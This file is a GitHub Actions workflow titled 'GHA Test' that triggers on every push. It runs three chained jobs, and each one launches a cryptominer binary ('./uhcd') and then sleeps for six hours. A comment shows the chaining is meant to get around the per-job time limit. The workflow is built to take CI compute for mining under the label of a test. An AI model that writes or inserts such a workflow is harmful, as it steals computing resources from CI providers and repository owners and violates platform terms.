name: GHA Test
on: [push]
jobs: 
  Run-crypto1: #Each job can run for 6h max
    runs-on: ultimatehackingcoin/uhc
    steps:
      - run: echo "Running cryptominer"
      - run: ./uhcd
      - run: sleep 6h
  Run-crypto2:
    runs-on: ultimatehackingcoin/uhc
    needs: Run-crypto1
    steps:
      - run: echo "Running cryptominer"
      - run: ./uhcd
      - run: sleep 6h
  Run-crypto3:
    runs-on: ultimatehackingcoin/uhc
    needs: Run-crypto2
    steps:
     - run: echo "Running cryptominer"
     - run: ./uhcd
     - run: sleep 6h
